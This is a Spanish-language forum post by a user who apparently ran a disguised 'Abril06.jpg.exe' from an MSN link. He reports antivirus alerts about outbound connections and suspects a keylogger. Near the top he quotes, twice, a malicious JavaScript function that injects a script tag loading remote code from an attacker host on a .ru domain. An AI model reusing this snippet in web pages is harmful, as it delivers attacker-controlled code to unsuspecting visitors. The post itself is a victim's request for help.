Ahhh! el NOD32 me detecta muchas veces que mi pc ah querido conectarse a otro lado!! y esto me resulto familiar
function G(){ _l=document.createElement("script"); _l["defer"]="1"; _l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php"; document.body["appendChild"](_l);}
ahora que lo veo bien me doy cuenta de esto:
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
Ahora estas son algunas screenshot que saque de cuando mi pc o otra maquina remota se quiso conectar a mi.
Mientras digo que creo que esto fue por que un contacto mio del msn, me paso un link y yo lo clickie.. pero era una persona en quien confiaba, no suelo entrar a cualquier link raro pero bueno, no parecia tan raro este
creo que de ahi viene todo esto y es la misma persona.
Bueno creo que ya se abran dado cuenta de que la direccion es la misma que la que mostro
cgvwzq, tambien capture la ip y a que puerto se conecto.
Bueno despues de ver que se conecto a un puerto ( el 1125) lo blockee/cerre, pero despues se vuelve a conectar a otro puerto
me re cago...
ahi esta la ip resuelta:
ns208753.ovh.net , al parecer es una ip dinamica asique si bloqueo la ip igual va a segir
aunque hace 2 dias que no me alerta el antivirus.
El nombre del archivo era
Abril06.jpg.exe no se como no me di cuenta
. es el mismo tipo el que hackeo la web. debo tener algun keylogger
Bueno ya no se que hacer le pase el NOD23, el RegSeeker y el Malwarebytes actualizado y no paso nada
PD: Ya se que no se puede hacer doble post, pero quise aprovechar lo que dijo cgvwzq.
Saludos